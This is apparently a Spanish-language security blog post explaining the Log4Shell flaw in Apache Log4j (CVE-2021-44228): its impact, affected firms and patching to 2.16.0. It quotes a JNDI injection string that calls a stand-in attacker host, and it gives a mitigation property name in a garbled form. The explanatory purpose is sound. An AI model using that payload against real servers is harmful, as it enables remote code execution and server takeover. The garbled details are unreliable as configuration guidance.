Se ha descubierto recientemente una vulnerabilidad de Log4j (Log4Shell, CVE-2021-44228) en la utilidad Apache que permite la ejecución remota de código (RCE) sin autenticación y la toma de control del servidor. Debido al amplio uso de la herramienta Apache, que afecta a empresas como Amazon, Apple, Cisco, Steam, Tesla, Twitter y muchas más, el problema es de escala mundial. Ya está disponible un parche y se están haciendo accesibles otras soluciones.

Encuentra las últimas medidas de mitigación aquí.

¿Qué ha pasado?

Se ha encontrado una vulnerabilidad, que se dice que fue descubierta por primera vez el 1 de diciembre y explotada inicialmente en Minecraft, en Log4j, una biblioteca de registro de Java. Esta vulnerabilidad permite realizar búsquedas en la red, lo que permite incluso a un atacante sin experiencia inyectar código arbitrario desde un dominio no autorizado en un servidor vulnerable, haciéndose con él. Las versiones 2.0 -2.15.0 de Log4j son vulnerables y han recibido la máxima puntuación CVSS 3.0 sobre 10.

¿Cómo se produjo?

La vulnerabilidad comenzó como una broma en los servidores de Minecraft, donde los jugadores pueden enviar un mensaje en el chat que contenga una cadena específica de código ${jndi:ldap://attacker.com/a} y tomar efectivamente el control de un servidor o cliente de Minecraft. Debido a la simplicidad de esta explotación, los atacantes se han apresurado a aprovecharla una vez que la vulnerabilidad se hizo pública el 9 de diciembre.

¿Cuáles son los efectos?

Los investigadores han informado de que la vulnerabilidad se utiliza para instalar malware de minería de criptomonedas, redes de bots, ejecutar ataques de denegación de servicio y filtrar datos sensibles de los servidores vulnerables. La vulnerabilidad está afectando a servicios de todo el mundo como Apple, Tencent, Steam, Twitter, Baidu, DIDI, JD, NetEase, CloudFlare, Amazon, Tesla, Google, Webex, LinkedIn y otros. El riesgo que supone esta vulnerabilidad exige una rápida y gran atención por parte de todas las organizaciones afectadas para minimizar los posibles daños. Desgraciadamente, lo que queda del mes de diciembre será una pesadilla de limpieza para los directores de TI, ya sobrecargados de trabajo, entrando en el nuevo año. Todavía no se sabe lo suficiente y se está investigando más sobre el asunto, ya que muchas empresas aún no han emitido una declaración sobre el tema.

¿Qué se está haciendo al respecto?

Para empezar, Apache ha solicitado que todas las versiones de Log4j se actualicen a la versión 2.16.0, en la que la vulnerabilidad, rastreada como CVE-2021-45046, está corregida. La solución inicialmente presentada de establecer la propiedad del sistema “Log4j2.noFormatMsgLookup” a “True”, no mitiga el problema como se pensaba inicialmente que era la solución.

Además, diferentes proveedores de software y empresas de ciberseguridad también están abordando este tema presentando soluciones propias sobre cómo hacer frente a la vulnerabilidad. Este tema se está haciendo público a través de anuncios nacionales y organizativos y se está debatiendo ampliamente para llegar a los muchos usuarios de la herramienta en todo el mundo que podrían verse afectados por la vulnerabilidad.

¿Qué medidas se están tomando para evitarlo en el futuro?

La verdad es que no se puede hacer mucho para evitar estas vulnerabilidades en el futuro. Los errores y fallos similares a este siempre existirán y seguirán perturbando el mundo de la informática. No obstante, se están ofreciendo actualizaciones rápidas y ayuda a todas las organizaciones afectadas.

Las vulnerabilidades más pequeñas y sencillas pueden causar grandes daños, pérdidas financieras y fatiga a los trabajadores de TI. Como se señala en un reciente informe de CYREBRO, el vector de amenaza más común que encontramos a partir de 2021 es el aprovechamiento de vulnerabilidades. Es imperativo que las organizaciones traten estos incidentes con toda la atención, ya que cada segundo que no se trate una vulnerabilidad puede causar implicaciones colosales. Este incidente puede verse como un rápido recordatorio de lo crítico que es mantener y estar al día con los parches y actualizaciones de software relevantes para la empresa.

Evitar este tipo de casos es casi imposible, pero ser capaz de responder rápidamente y mitigar las amenazas antes de que se produzcan daños significativos es completamente factible. Si tu organización es consistente en el mantenimiento de TI, la auditoría y la actualización correspondiente, el tiempo de respuesta se vuelve más rápido y sencillo, manteniendo a las organizaciones cada vez más activas y seguras.